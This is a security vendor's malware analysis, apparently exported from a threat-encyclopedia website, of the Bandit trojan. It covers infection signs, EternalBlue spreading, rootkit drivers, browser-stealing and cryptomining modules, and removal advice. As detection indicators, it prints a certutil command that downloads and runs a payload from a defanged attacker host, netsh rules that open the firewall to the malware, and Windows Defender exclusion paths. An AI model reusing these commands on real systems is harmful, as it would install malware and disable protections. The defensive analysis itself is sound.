{"id":449,"date":"2021-02-21T07:53:49","date_gmt":"2021-02-21T07:53:49","guid":{"rendered":"https:\/\/threats.amnpardaz.com\/en\/?p=449"},"modified":"2023-02-07T09:01:21","modified_gmt":"2023-02-07T09:01:21","slug":"trojan-win32-bandit-aplib","status":"publish","type":"post","link":"https:\/\/threats.amnpardaz.com\/en\/2021\/02\/21\/trojan-win32-bandit-aplib\/","title":{"rendered":"Trojan.Win32.Bandit.ApLib"},"content":{"rendered":"<h2>General explanation<\/h2>\n<p><strong>Type:<\/strong> Trojan<\/p>\n<p><strong>Degree<\/strong> <strong>of destruction<\/strong>: high<\/p>\n<p><strong>Prevalence:<\/strong> high<\/p>\n<p><strong>Names of the malware:<\/strong><\/p>\n<ul>\n<li>Trojan.Win32.Bandit.ApLib (Padvish)<\/li>\n<li>HEUR:Trojan.Win32.Chapak.pef (Kaspersky)<\/li>\n<li>TR\/AD.GoCloudnet.irwn ( Avira)<\/li>\n<\/ul>\n<h3>What is a Trojan?<\/h3>\n<p>Trojans are malware types that introduced themselves as healthy and legal software and acted similarly to useful and applicable software but cause many destructions to the system when executing. The downloaded software from the internet, placing HTML text, attaching it to an email, etc. are ways that trojans use to enter the system. Contrary to viruses and computer worms, Trojans are not reproducible.<\/p>\n<h3>What is Bandit Trojan?<\/h3>\n<p>Bandit is a Trojan that hides its files and processes using low-level techniques of Windows (kernel). This malware uses EternalBlue for distribution. Then, it will download different modules connected to the command and control server and executes them on the victim&#8217;s system.<\/p>\n<h2>Technical explanation<\/h2>\n<h3><strong>Signs of infection\u00a0<\/strong><\/h3>\n<ul>\n<li>TestApp registry key with malicious domains in the following sub-keys.<\/li>\n<li>Two scheduled tasks are as follows one of them will execute the malware update file, and the other with executing the file of the malware on the system<\/li>\n<\/ul>\n<p><code><strong>name<\/strong>\u00a0: ScheduledUpdate<\/code><\/p>\n<p><code><strong>command<\/strong>\u00a0: \"cmd.exe \/C certutil.exe -urlcache \u2013split \u2013f hxxps:\/\/bestblues[.]tech\/app\/app.exe C:\\Users\\User\\AppData\\Local\\Temp\\csrss\\scheduled.exe &amp;&amp; C:\\Users\\User\\AppData\\Local\\Temp\\csrss\\scheduled.exe \/31340\"<\/code><\/p>\n<p><code>scheduled : ONLOGON<\/code><\/p>\n<p><code><strong>name<\/strong>\u00a0: csrss<\/code><\/p>\n<p><code><strong>command<\/strong>\u00a0: \"C:\\Windows\\rss\\csrss.exe\"<\/code><\/p>\n<p><code><strong>scheduled<\/strong>\u00a0: ONLOGON<\/code><\/p>\n<ul>\n<li>The sub-key in the Run registry key which is executing the \u201cC:\\Windows\\rss\\csrss.exe\u201d file<\/li>\n<li>The following suspicious Firewall laws:<\/li>\n<\/ul>\n<p><code>Cmd.exe \/c \u201cnetsh advfirewall firewall add rule name=\u201dcsrss\u201d dir=\u201din\u201d action=allow program=\u201dC:\\Windows\\rss\\csrss.exe\u201d enable=yes\u201d<\/code><\/p>\n<p><code>Cmd.exe \/c \u201cnetsh advfirewall firewall add rule name=\u201dcsrss\u201d dir=\u201din\u201d action=allow program=\u201d%AppData%Roaming\\EpicNet Inc\\CloudNet\\cloudnet.exe\u201d enable=yes\u201d<\/code><\/p>\n<ul>\n<li>The following items in the Windows Defender exception list<\/li>\n<\/ul>\n<p><code>\u2022\u00a0<strong>Files\/Directories<\/strong>:<\/code><\/p>\n<p><code>C:\\Windows<\/code><\/p>\n<p><code>C:\\Windows\\rss<\/code><\/p>\n<p><code>AppData%Roaming\\EpicNet Inc\\CloudNet<\/code><\/p>\n<p><code>AppData%Local\\Temp\\csrss<\/code><\/p>\n<p><code>AppData%\\Roaming\\WisprPine<\/code><\/p>\n<p><code>C:\\Windows\\Windefender<\/code><\/p>\n<p><code>AppData%Local\\Temp\\Wup<\/code><\/p>\n<p><code>C:\\Windows\\System32\\drivers<\/code><\/p>\n<p><code>\u2022\u00a0<strong>Processes<\/strong>: csrss.exe , cloudnet.exe , windefender.exe<\/code><\/p>\n<h3><strong>Explaining the action\u00a0<\/strong><\/h3>\n<p><strong>Performing the technique of identification Sandbox and VM\u00a0<\/strong><\/p>\n<p>The malware tries to execute techniques to understand whether the execution environment is VM or Sandbox. It will stop the execution if it detects the environment.<\/p>\n<p><strong>Malicious sub-key of TestApp registry key<\/strong><\/p>\n<p>As mentioned before, the malware will create a key with the name of TestApp in the HKCU\\software\\microsoft\\TestApp. In this case, the mentioned key has many sub-keys such as the following items (the amounts of this sub-key, especially the server addresses&#8221; will possibly be different. Also, in the new type of this malware, it will use random strings such as &#8220;dd47a129&#8221; in replace of &#8220;TestApp&#8221;):<\/p>\n<p><code>Key : HKCU\\software\\microsoft\\TestApp<\/code><\/p>\n<p><code>Subkeys :<\/code><\/p>\n<p><code>Uuid = \"\"<\/code><\/p>\n<p><code>command = \"\"<\/code><\/p>\n<p><code>FirstInstallDate = \"56268135e\"<\/code><\/p>\n<p><code>ServiceVersion = \"\"<\/code><\/p>\n<p><code>SC = \"\"<\/code><\/p>\n<p><code>PGDSE = \"\"<\/code><\/p>\n<p><code>VC = \"\"<\/code><\/p>\n<p><code>ServerVersion = \"94\"<\/code><\/p>\n<p><code>CDN = \"hxxps:\/\/bestblues[.]tech\"<\/code><\/p>\n<p><code>PP = \"\"<\/code><\/p>\n<p><code>name = \"SmallSea\"<\/code><\/p>\n<p><code>servers = \"hxxps;\/\/whitecontroller[.]com , sleepingcontrol[.]com, venoxcontrol[.]com, okonewwacon[.]com\"<\/code><\/p>\n<p><code>firewall = \"\"<\/code><\/p>\n<p><code>defender = \"\"<\/code><\/p>\n<p><strong>Creating the csrss processes<\/strong><\/p>\n<p>The malware will create the C:\\Windows\\rss directory and turns it into a hidden directory, after executing techniques for upgrading the access level. Then, it will copy its file in this path with this name: csrss.exe.<\/p>\n<p><strong>Distribution in the local network\u00a0<\/strong><\/p>\n<p>This malware uses tools related to EternalBlue and DoublePulsar vulnerabilities for distribution. Systems with vulnerable versions detect the SMB protocols at the network level and by using this vulnerability, will execute its malware on it.<\/p>\n<p><strong>Downloading Drivers\u00a0<\/strong><\/p>\n<p>Malware will create and run three drives:<\/p>\n<ol>\n<li>Winmon.sys drive: this drive is used to hide malware processes<\/li>\n<li>WinmonFs.sys drive: this drive hides the directory\/files of the malware from the sight of antiviruses and monitoring tools.<\/li>\n<li>WinmonProcessMonitor drive: this drive has a long list of the name of processes related to system monitoring products, antiviruses, etc. and it will survey the name of the new processes does not involve in this list when creating each process on the system. Otherwise, it will end the execution of the malware.<\/li>\n<\/ol>\n<p><strong>Downloading and executing malware module\u00a0<\/strong><\/p>\n<ol>\n<li>Browser Stealer module: this module steals cookies, history, and local storage of browsers such as Chrome, Coccoc, Firefox, Opera, and Yandex and it will send them to the server in the format of a zip file<\/li>\n<li>Router Exploit Module: this module executes to sue the rooter&#8217;s vulnerabilities on the network level.<\/li>\n<li>Collectchromefingerprint: this module analyzes whether the Chrome browser is installed on the system. It will open the following link in the browser if it is installed on the system.<\/li>\n<\/ol>\n<p><code>hxxps:\/\/swebgames[.]site\/test.php?uuid=a1058f4a-2f08-4679-baf2-ae6c436cfaa5&amp;browser=chrome<\/code><\/p>\n<p>This link is a blank page that in the background will execute a JavaScript library &#8220;DetectRTC&#8221; with the link of https:\/\/github.com\/muaz-khan\/DetectRTC and analyze the features of WebRTC such as whether the victim&#8217;s system has a Microphone, Speaker, Webcam; the number of media systems, the possibility for snapshot, etc. and send the results to the following path:<\/p>\n<p><code>hxxps:\/\/swebgames[.]site\/fp.php<\/code><\/p>\n<p style=\"padding-left: 30px\">4. bot module: this module will register the victim&#8217;s system in the malware servers and then will connect it many times. Obtaining a list of active pools of the bitcoin network and connecting with them to perform mining cryptocurrencies on the victim&#8217;s service is one of these connections.<\/p>\n<h2>How to deal with it and disinfect the system<\/h2>\n<p><a class=\"editor-rtfLink\" href=\"https:\/\/padvish.com\/en-us\/Main\" target=\"_blank\" rel=\"noopener\">Padvish Antivirus<\/a>\u00a0detects and disinfects this malware. To prevent any possible infection by malware that uses EternalBlue vulnerability, it is recommended to use the provided security patch ms17-010 from Microsoft Co. Padvish IPS will detect malware that uses this kind of vulnerability and will prevent them from entering the system.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>General explanation Type: Trojan Degree of destruction: high Prevalence: high Names of the malware: Trojan.Win32.Bandit.ApLib (Padvish) HEUR:Trojan.Win32.Chapak.pef (Kaspersky) TR\/AD.GoCloudnet.irwn ( Avira) What is a Trojan? Trojans are malware types that introduced themselves as healthy and legal software and acted similarly to useful and applicable software but cause many destructions to the system when executing. The&hellip;<\/p>\n","protected":false},"author":16,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[2],"tags":[],"class_list":["post-449","post","type-post","status-publish","format-standard","hentry","category-trojan"],"_links":{"self":[{"href":"https:\/\/threats.amnpardaz.com\/en\/wp-json\/wp\/v2\/posts\/449","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/threats.amnpardaz.com\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/threats.amnpardaz.com\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/threats.amnpardaz.com\/en\/wp-json\/wp\/v2\/users\/16"}],"replies":[{"embeddable":true,"href":"https:\/\/threats.amnpardaz.com\/en\/wp-json\/wp\/v2\/comments?post=449"}],"version-history":[{"count":4,"href":"https:\/\/threats.amnpardaz.com\/en\/wp-json\/wp\/v2\/posts\/449\/revisions"}],"predecessor-version":[{"id":1283,"href":"https:\/\/threats.amnpardaz.com\/en\/wp-json\/wp\/v2\/posts\/449\/revisions\/1283"}],"wp:attachment":[{"href":"https:\/\/threats.amnpardaz.com\/en\/wp-json\/wp\/v2\/media?parent=449"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/threats.amnpardaz.com\/en\/wp-json\/wp\/v2\/categories?post=449"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/threats.amnpardaz.com\/en\/wp-json\/wp\/v2\/tags?post=449"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}